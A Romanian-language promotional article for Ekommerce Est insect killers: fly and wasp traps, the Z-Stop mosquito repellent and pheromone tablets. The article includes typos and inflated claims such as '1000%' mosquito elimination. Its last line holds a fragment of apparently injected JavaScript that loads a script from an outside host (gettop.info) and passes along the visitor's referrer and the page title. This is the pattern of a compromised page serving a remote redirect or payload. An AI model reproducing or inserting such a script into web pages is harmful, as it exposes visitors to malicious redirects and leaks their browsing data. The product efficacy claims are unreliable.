426039_511431965576378_903752178_nNu mai suporti mustele si tantarii care iti intra in locuinta ori de cate ori deschizi fereastra? Te-ai saturat sa ai perdelele patate si de sunetul sacaitor pe care acestea in profoaca? Apeleaza la Ekommerce Est si incepe sa utilizezi chiar de maine insect killer.

Solutia ideala pentru a starpi insectele – insect killer!

Ekommerce Est te intampina cu mai multe tipuri de insect killer. Astfel, de aici poti achizitiona insect killer pentru gandaci, muste, furnici, viespi si tantari. Solutiile propuse de aceasta companie sunt ecologice, deoarece nu contin substante nocive pentru mediul inconjurator, si se utilizeaza pentru anumite insecte. de exemplu, capcana Enterfly poate fi utilizata cu succes in mai multe incaperi, atat in unitatile unde se vad produse alimentare, cat si in campinguri sau in crescatoriile de animale. Cum functioneaza aceasta capcana? Foarte simplu: torni apa in insect killer si il asezi in spatiul respectiv. La scurt timp dupa, vei observa ca mustele sunt atrase de momeala in forma de granule ce este acoperita de apa.

Cu insect killer de la  Ekommerce Est poti elimina si viespii. Toarna apa peste raftul din capcana si suspenda capcana la o inaltime de circa 1.5 metri. La fel ca in cazul mustelor, aceasta capcana isi va dovedi eficienta mult mai repede decat iti imaginezi. Dupa ce s-a umplut, va trebui sa o golesti. Aceasta capcana se utilizeaza in livezi si curti sau chiar in mediile agricole si industriale.

Vara aduce cu sine soare din belsug, temperatur ridicate, dar si… tantari! Aceste insecte mici care prvoaca un zgomot foarte deranjant, reusesc sa se strecoare prin orice gaura pentru a patrunde in locuintele noastre. Plasele anti-tantari sunt eficiente doar daca au fost foarte bine montate. In schimb, pentru a avea garantia ca tantarii vor fi eliminati 1000% alege sa folosesti insect killer de la Ekommerce Est.

De asemeni, din oferta Ekommerce Est ai posibilitatea de a achizitiona si Z-Stop. Mirosul de usturoi al acestui produs este perceput doar de tantari, nu si de alte animale sau de om. Doarece sunt foarte sensibili cand simt aceasta aroma, tantarii vor fi atrasi imediat. Pentru eficienta sporita iti recomandam sa il folosesti alaturi de produsul Synergy Barrier. Utilizeaza o pompa, de doua ori pe luna, pentru a imprastia substanta in zonele vrei sa starpesti tatarii pentru totdeauna si linistea va fi iar de partea ta.

Ekommerce Est iti mai pune la dispozitie si pastile cu feromoni. Aceste pastile trebuie sa fie alese in functie de insectele de care iti doresti sa scapi. Pune insectele in capcana si schimba-le o data la doua trei luni pentru a scapa definitiv de insectele care te deranjeaza. Pastilele de la Ekommerce Est te vor ajuta sa scapi de gandacul de paine, musca de ulei, molii, omizi si gargarite.

Nu mai sta pe ganduri si achizitioneaza acum insect killer de la Ekommerce Est. Scapa de insectele care iti rapesc linistea si iti intind nervii la maximum cu ajutorul unor solutii eficiente si ecologice.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;